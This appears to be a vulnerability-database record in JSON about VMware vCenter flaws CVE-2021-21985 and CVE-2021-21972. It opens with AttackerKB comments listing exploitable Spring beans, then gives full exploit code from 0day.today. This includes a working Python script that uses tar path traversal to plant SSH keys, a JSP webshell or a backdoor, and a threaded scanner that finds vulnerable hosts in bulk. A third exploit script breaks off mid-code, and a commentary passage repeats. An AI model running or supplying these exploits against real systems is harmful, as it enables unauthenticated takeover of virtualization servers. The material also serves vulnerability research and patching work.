vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\n**ccondon-r7** at May 26, 2021 5:41pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n vsanStretchedClusterMutationProviderImpl\n vsanStretchedClusterPropertyProviderImpl\n vsanSupportMutationProviderImpl\n vsanSupportProviderImpl\n vsanThreadPoolImpl\n vsanUpgradeMutationProviderImpl\n vsanUpgradePropertyProviderAdapter\n vsanUpgradeProviderImpl\n vsanUtils_setMessageBundle\n vsanVirtualDisksDataProvider\n vsanVirtualObjectsProvider\n vsanWorkerThreadFactory\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n vsphereHealthServiceFactory\n vsphereHealthThreadPoolImpl\n vumLoginService\n vumPropertyProviderAdapter\n whatIfPropertyProviderAdapter\n whatIfPropertyProviderImpl\n witnessCandidateInventoryService\n witnessHostsProvider\n \n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21985", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-29T00:00:00", "id": "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "href": "https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "1337DAY-ID-35879", "href": "https://0day.today/exploit/description/35879", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh [email\u00a0protected]' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? [y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T01:31:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "zdt", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "1337DAY-ID-35863", "href": "https://0day.today/exploit/description/35863", "sourceData": "#-*- coding:utf-8 -*-\nbanner = \"\"\"\n 888888ba dP \n 88 `8b 88 \n a88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n 88 `8b. 88' `88 88 Y8ooooo. 88 88 \n 88 .88 88. .88 88 88 88. .88 \n 88888888P `88888P8 dP `88888P' `88888P' \n ooooooooooooooooooooooooooooooooooooooooooooooooooooo \n @time:2021/02/24 CVE-2021-21972.py\n C0de by NebulabdSec - @batsu \n \"\"\"\nprint(banner)\n\nimport threadpool\nimport random\nimport requests\nimport argparse\nimport http.client\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhttp.client.HTTPConnection._http_vsn = 10\nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'\n\nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\"\n\ndef get_ua():\n first_num = random.randint(55, 62)\n third_num = random.randint(0, 3200)\n fourth_num = random.randint(0, 140)\n os_type = [\n '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',\n '(Macintosh; Intel Mac OS X 10_12_6)'\n ]\n chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\n\n ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\n '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\n )\n return ua\n\ndef CVE_2021_21972(url):\n proxies = {\"scoks5\": \"http://127.0.0.1:1081\"}\n headers = {\n 'User-Agent': get_ua(),\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n targetUrl = url + TARGET_URI\n try:\n res = requests.get(targetUrl,\n headers=headers,\n timeout=15,\n verify=False,\n proxies=proxies)\n # proxies={'socks5': 'http://127.0.0.1:1081'})\n # print(len(res.text))\n if res.status_code == 405:\n print(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url))\n # print(\"[+] Command success result: \" + res.text + \"\\n\")\n with open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw:\n fw.write(url + '\\n')\n else:\n print(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\")\n # except Exception as e:\n # print(e)\n except:\n print(\"[-] \" + url + \" Request ERROR.\\n\")\ndef multithreading(filename, pools=5):\n works = []\n with open(filename, \"r\") as f:\n for i in f:\n func_params = [i.rstrip(\"\\n\")]\n # func_params = [i] + [cmd]\n works.append((func_params, None))\n pool = threadpool.ThreadPool(pools)\n reqs = threadpool.makeRequests(CVE_2021_21972, works)\n [pool.putRequest(req) for req in reqs]\n pool.wait()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\",\n \"--url\",\n help=\"Target URL; Example:http://ip:port\")\n parser.add_argument(\"-f\",\n \"--file\",\n help=\"Url File; Example:url.txt\")\n # parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \")\n args = parser.parse_args()\n url = args.url\n # cmd = args.cmd\n file_path = args.file\n if url != None and file_path ==None:\n CVE_2021_21972(url)\n elif url == None and file_path != None:\n multithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/35863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T13:45:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-25T00:00:00", "type": "zdt", "title": "VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-25T00:00:00", "id": "1337DAY-ID-36472", "href": "https://0day.today/exploit/description/36472", "sourceData": "# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: CHackA0101\n# Vendor Homepage: https://kb.vmware.com/s/article/82374\n# Software Link: https://www.vmware.com/products/vcenter-server.html\n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)\n# CVE: 2021-21972\n\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md\n\n#!/usr/bin/python2\n\nimport os\nimport urllib3\nimport argparse\nimport sys\nimport requests\nimport base64\nimport tarfile\nimport threading\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nmyargs=argparse.ArgumentParser()\nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True)\nmyargs.add_argument('-L','--local',help='Your local 